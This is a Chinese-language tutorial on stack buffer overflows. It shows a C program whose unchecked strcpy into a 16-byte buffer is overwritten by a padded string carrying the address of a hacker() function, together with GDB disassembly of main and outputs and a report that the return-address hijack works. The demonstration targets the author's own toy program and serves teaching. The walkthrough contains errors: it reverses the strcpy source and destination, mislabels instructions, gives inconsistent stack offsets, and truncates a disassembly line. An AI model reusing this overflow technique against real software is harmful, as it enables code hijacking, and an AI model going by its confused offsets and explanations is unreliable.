緩衝區溢位攻擊是利用緩衝區溢位漏洞所進行的攻擊行動

如果有人利用棧中分配的緩衝區寫溢位，悄悄地將一段惡意程式碼的首地址

作為返回地址覆蓋寫到原先的正確的返回地址處。那麼程式在執行ret的時候會悄悄地轉移到這個惡意程式碼段處執行

從而可以輕易獲得系統特權，進而進行各種非法操作

造成緩衝區溢位的原因就是系統沒有對作為緩衝區的陣列進行越界檢查

給出一段程式碼

#include <stdio.h>
#include "string.h"


void outputs(char *str)
{
char buffer[16];
strcpy(buffer,str);//str to buffer
printf("%s \n",buffer);
}


void hacker(void)
{
printf("being hacked\n");
}


int main(int argc,char *argv[])
{
outputs("1234567123456712345671234567\xaa\x84\x04\x08");
return 0;
}

main函式呼叫outputs函式。

通過對main函式進行反彙編，可以得到

Dump of assembler code for function main:
   0x080484be <+0>:push   %ebp
   0x080484bf <+1>:mov    %esp,%ebp
   0x080484c1 <+3>:and    $0xfffffff0,%esp
   0x080484c4 <+6>:sub    $0x10,%esp
   0x080484c7 <+9>:movl   $0x8048584,(%esp)
   0x080484ce <+16>:call   0x804847d <outputs>
   0x080484d3 <+21>:mov    $0x0,%eax
   0x080484d8 <+26>:leave  
   0x080484d9 <+27>:ret  

通過對outputs函式進行反彙編，可以得到

Dump of assembler code for function outputs:
   0x0804847d <+0>:push   %ebp
   0x0804847e <+1>:mov    %esp,%ebp
   0x08048480 <+3>:sub    $0x28,%esp
   0x08048483 <+6>:mov    0x8(%ebp),%eax
   0x08048486 <+9>:mov    %eax,0x4(%esp)
   0x0804848a <+13>:lea    -0x18(%ebp),%eax
   0x0804848d <+16>:mov    %eax,(%esp)
   0x08048490 <+19>:call   0x8048340 <

可以看出，彙編程式碼

 0x08048490 <+19>:call   0x8048340 <[email protected]>

是對應於c程式碼

strcpy(buffer,str);//str to buffer這一句的

那麼strr[0]是對應於   0x0804848a <+13>:lea    -0x18(%ebp),%eax這一句的

那麼buffer[0]是對應於   0x08048483 <+6>:mov    0x8(%ebp),%eax這一句的

也就是說strcpy(buffer,str);這一條語句，就是將buffer陣列賦值給str陣列

而ebp+8的地址就是返回地址所在的記憶體地址的位置

所以我們必須將-0x18(%ebp)到4(%ebp)之間全部填充滿

然後-4(%ebp)到8(%ebp)填充為我們想要程式返回的地址

這樣函式outputs執行完畢以後，就會返回到我們想要返回的地址

通過對hacker進行反彙編

我們得到hacker函式的首地址

如圖所示，hacker函式的首地址為0x080484aa

那麼我們就把esp+4到esp+8的區間填充為0x080484aa

可以看到，劫持成功了